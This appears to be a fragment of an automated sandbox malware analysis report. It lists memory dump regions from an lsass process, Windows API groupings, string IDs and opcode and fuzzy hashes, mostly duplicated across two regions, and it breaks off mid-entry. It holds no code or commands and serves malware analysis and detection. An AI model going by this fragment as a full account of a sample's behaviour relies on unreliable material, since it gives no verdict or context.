                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: c0c11d9e0e791decef7c450a5b00cf9e397162e903bcabc121417c3cfe85881c
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: 8C516F3560CB0587E766CB16F84079ABBB0FB84B84F6C8129DD4E83756DB39C9878B40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: 954548f2d2f2eb1727b34777494260f77ffc5ea29933f4fc2f9ab99450d76c11
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 23516335218B498BE724CF16B84079AB7B1FB84B84F584119DE4E4375ADF78D98BCB40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: 6a12a7281aac09f8d6c5c6291dd5d0003b29e4a6000463bcaf97762cff550334
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: EC514035218B498BE725CF16B84079AB7B0FB84B84F588119DD4E8375ADB39E987CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: a0d3d935ebb2149f436fe8553ea03842cde1fcc6533f6d8c8d18eb5ce2a62dd7
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: 3E61B63612DB8886E761CF15F4543AAB7B0F788744F540115FA8D87BAADBBCD586CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: aadab68108afb3d45a975aa90a1c62a39548663b6fcc21350131460ce12e4cd8
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: 5561D93652CB8886E761CB15F44036AB7B1F788744F684116FA8D83BA9DB7CC586CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: 7a4681845d68765c2fe651341d7c065f2c313b53bf4c6282e3f71e70ffd23cd5
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 5C114F36609B4493EB248B61F40429AA7B0FF45B80F080126DE8D037A9EF7DC9DAC7C4
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: 2d873f16d66e6ad334d11c34629bcde1895a150ea79aa41e247f0e4022255a44
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 19112E3660DB4493EF258F21F40439A67B0FB45B80F1C4126DA8D83799EB7DC99AC784
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 875f8e91b8ec60e369ef0c0a4fa31e9cbd0d42de610c1aa331d7fb3e193f8215
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 1351CF32359F08CAEB58CB55F444BAC37B1EB54B98F188121DA5E4778ADBB9C8D2C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: f573f4fdb9b547cf28fdda7db820dacec59f80b345142f6cbdf1435a977ec1d3
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 6C51B032259F088ADB5ACF55F444BAC77B1EB54B98F2C4120DA5E8778AD779C883C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: d9f36c28b8368ba67f33a76669638aa3bbfff7f91a8384785df6904ca07c6f67
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: A1617C3250CBC885EB208B15F4407DABBB0FB95B98F485215EB9C17B96DBB8D1D6CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 611d291301d54a95b7270af50630b4b285e2c5ae5dac77d113480ec9eb855077
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 6951C13610CB988BEB748F12A5443A877B0FB50B84F1C6116DA9D47BD2CBB8E4E6C741
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000003.1782464858.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_3_17d2dd20000_lsass.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 9924569a5ab876b337d3d8800d55b27160b79a26f432793cf3b9df684b44e794
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 7251803218CB488AEB748F11A68839877B0FB55B94F1C5116DA9D47B9FCB38C4D6CB01
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 649d633d447bc471339a97788d72ab742860506d99827fa6d212f61556e560f6
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 21617C3250CBC885EB629B15F4407DAB7B0FB85B98F585215EB9C53B96DB78C1D2CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: dfdec56db3823318c9e025b071a3336cc024d0b78a8e750ecd046d09345923fd
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 1F51713610CB4887EB768F12A54439877B1FB54B94F2C6116DA9D87B96CB38E4D3C701
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: 3339c7917aa704551e98117c40d034c359a0e0c72837dcb32f0ec74c5693b7a9
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: DB115431318F8592EB209B35F8003DA66B4FF44781F9845259E8D83696EFA9C9C7C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: 60df1b71e1231fa2c7469dbf85e8dad01a53585f23731e0545c19f3c18ea771c
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 4711423131CF8592EB21AB25F8503DA63B4FF44780FAC45259A8DC3696EF69C98BC740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: 3298a726dc5465890309b67df4462229f4f7f8e3e357887ff85e25c4a6c59ccf
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: B4D19B32718B4889E711CFA5E4407EC3BB5EB55B98F888216DE5D97B9ADA34C186C380
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: 41f488ba3b8cddeaf4617f804082913e195b0740167ad272b5542c20528b2621
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: A8D1DF32718B8889E711CFA5E4403EC3BB5FB55B98F988216CE5D97B9ADA35C087C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: 0f95c1dffc8255ab5602c6e5a498ab9dff0cbe01a932d44c9348a9f5b6c20eba
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 98011332619F98DAE714DF66B80428977B1FB89F80B094025DB4D53729DE38D4D2C780
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: cd02153ce22ce19679769f5172814509ef17c4f9f749e7c6ac4d95d36cdfb506
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 77011332618F98DAE714DF66B80428977B1FB89F80B194026DB4DA3729DE39D492C740
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000017D2DD628DF), ref: 0000017D2DD62A12
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
